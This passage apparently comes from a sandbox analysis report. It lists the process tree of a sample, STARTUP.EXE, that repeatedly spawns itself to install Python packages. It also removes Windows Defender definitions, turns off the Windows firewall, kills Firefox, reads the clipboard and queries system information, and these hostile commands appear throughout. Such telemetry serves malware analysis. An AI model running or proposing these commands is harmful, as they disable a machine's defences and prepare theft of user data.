        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:5384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:3640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        18⤵
        
        PID:7236
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        19⤵
        
        PID:8820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        20⤵
        
        PID:14700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        18⤵
        
        PID:9932
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        19⤵
        
        PID:13792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:9444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:13824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:11304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        16⤵
        
        PID:16184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        16⤵
        
        PID:16564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:6324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:6996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:11852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:8984
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:14772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:14468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:8168
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:11956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:8520
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:8236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:11256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:12748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        14⤵
        
        PID:14456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:5524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:5960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:976
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:5484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:6840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:8944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:10132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:9924
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:13816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:3196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:15752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:4176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:8688
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:16572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:9864
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:13864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:10980
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:13768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:13208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:8288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        14⤵
        
        PID:14728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:6192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:6984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:9600
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:9844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:6840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:13320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:10940
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:3368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:12724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:16144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:11880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:7444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:7600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        12⤵
        
        PID:9468
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        13⤵
        
        PID:12024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        12⤵
        
        PID:11520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
        12⤵
        
        PID:15196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Get-Clipboard -TextFormatType Text"
        12⤵
        Clipboard Data
        
        PID:16368
        
        C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
        12⤵
        
        PID:17032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:2012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:2044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:1044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:5200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:4388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:7824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:10004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:9072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:15044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:8672
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:10932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:3776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        16⤵
        
        PID:16176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        16⤵
        
        PID:14544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:7800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:10196
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:10832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:7540
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:9592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:14876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:12880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:13272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        14⤵
        
        PID:7324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:5628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:4220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:6172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:5660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:9264
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:14884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:12792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:8252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:11344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:9388
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:9988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:11940
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        17⤵
        
        PID:16448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:12972
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        17⤵
        
        PID:14248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:16408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        14⤵
        
        PID:16200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        14⤵
        
        PID:10764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6244
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:7872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6888
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:10304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:8124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:8856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        12⤵
        
        PID:12100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:1712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:5208
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:1872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:3112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:9892
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:8468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:11932
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:14812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:14408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:7172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:10188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        16⤵
        
        PID:14500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        16⤵
        
        PID:16968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:6308
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
